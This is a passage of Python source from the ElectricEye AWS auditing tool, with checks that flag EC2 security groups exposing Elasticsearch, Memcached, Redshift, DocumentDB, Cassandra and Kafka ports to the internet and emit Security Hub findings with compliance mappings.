finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn
+ "/"
+ ipProtocol
+ "/security-group-elasticsearch-9200-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.14] Security groups should not allow unrestricted Elasticsearch (TCP 9200) access",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted Elasticsearch (TCP 9200) access on "
+ ipProtocol
+ ". Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_elasticsearch2_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.15] Security groups should not allow unrestricted Elasticsearch (TCP 9300) access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if toPort and fromPort == "9300" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn
+ "/"
+ ipProtocol
+ "/security-group-elasticsearch-9300-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SecurityGroup.15] Security groups should not allow unrestricted Elasticsearch (TCP 9300) access",
"Description": "Security group "
+ sgName
+ " allows unrestricted Elasticsearch (TCP 9300) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif toPort and fromPort == "9300" and cidrIpRange != "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn
+ "/"
+ ipProtocol
+ "/security-group-elasticsearch-9300-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.15] Security groups should not allow unrestricted Elasticsearch (TCP 9300) access",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted Elasticsearch (TCP 9300) access on "
+ ipProtocol
+ ". Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_memcached_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.16] Security groups should not allow unrestricted Memcached (UDP 11211) access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if (
toPort
and fromPort == "11211"
and ipProtocol == "udp"
and cidrIpRange == "0.0.0.0/0"
):
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-memcached-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SecurityGroup.16] Security groups should not allow unrestricted Memcached (UDP 11211) access",
"Description": "Security group "
+ sgName
+ " allows unrestricted Memcached (UDP 11211) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"ThreatIntelIndicators": [
{
"Category": "BACKDOOR",
"Value": "memcached 1.4.2 - Memory Consumption Remote Denial of Service",
"Source": "ExploitDB",
"SourceUrl": "https://www.exploit-db.com/exploits/33850",
},
{
"Category": "BACKDOOR",
"Value": "Ubuntu: USN-4125-1 (CVE-2019-15026): Memcached vulnerability",
"Source": "Rapid7 Vulnerability & Exploit Database",
"SourceUrl": "https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2019-15026",
},
],
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif (
toPort
and fromPort == "11211"
and ipProtocol == "udp"
and cidrIpRange != "0.0.0.0/0"
):
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-memcached-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.16] Security groups should not allow unrestricted Memcached (UDP 11211) access",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted Memcached (UDP 11211) access on "
+ ipProtocol
+ ". Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"ThreatIntelIndicators": [
{
"Category": "BACKDOOR",
"Value": "memcached 1.4.2 - Memory Consumption Remote Denial of Service",
"Source": "ExploitDB",
"SourceUrl": "https://www.exploit-db.com/exploits/33850",
},
{
"Category": "BACKDOOR",
"Value": "Ubuntu: USN-4125-1 (CVE-2019-15026): Memcached vulnerability",
"Source": "Rapid7 Vulnerability & Exploit Database",
"SourceUrl": "https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2019-15026",
},
],
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_redshift_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.17] Security groups should not allow unrestricted Redshift (TCP 5439) access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if toPort and fromPort == "5439" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-redshift-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SecurityGroup.17] Security groups should not allow unrestricted Redshift (TCP 5439) access",
"Description": "Security group "
+ sgName
+ " allows unrestricted Redshift (TCP 5439) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif toPort and fromPort == "5439" and cidrIpRange != "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-redshift-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.17] Security groups should not allow unrestricted Redshift (TCP 5439) access",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted Redshift (TCP 5439) access on "
+ ipProtocol
+ ". Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_documentdb_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.18] Security groups should not allow unrestricted DocumentDB (TCP 27017) access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if toPort and fromPort == "27017" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-documentdb-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SecurityGroup.18] Security groups should not allow unrestricted DocumentDB (TCP 27017) access",
"Description": "Security group "
+ sgName
+ " allows unrestricted DocumentDB (TCP 27017) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif toPort and fromPort == "27017" and cidrIpRange != "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-documentdb-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.18] Security groups should not allow unrestricted DocumentDB (TCP 27017) access",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted DocumentDB (TCP 27017) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_cassandra_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.19] Security groups should not allow unrestricted Cassandra (TCP 9142) access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if toPort and fromPort == "9142" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-cassandra-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SecurityGroup.19] Security groups should not allow unrestricted Cassandra (TCP 9142) access",
"Description": "Security group "
+ sgName
+ " allows unrestricted Cassandra (TCP 9142) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif toPort and fromPort == "9142" and cidrIpRange != "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-cassandra-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.19] Security groups should not allow unrestricted Cassandra (TCP 9142) access",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted Cassandra (TCP 9142) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_kafka_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.20] Security groups should not allow unrestricted Kafka streams (TCP 9092) access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if toPort and fromPort == "9092" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-kafka-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
